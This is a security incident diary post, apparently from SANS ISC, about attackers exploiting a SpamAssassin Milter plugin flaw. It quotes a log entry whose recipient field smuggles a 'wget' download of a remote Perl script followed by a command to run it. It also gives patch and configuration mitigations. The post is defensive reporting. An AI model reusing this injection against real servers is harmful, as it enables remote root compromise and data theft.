Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don't use the -x option when running this plugin, as well do not run it as root.

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

 

4 comment(s)
Diary Archives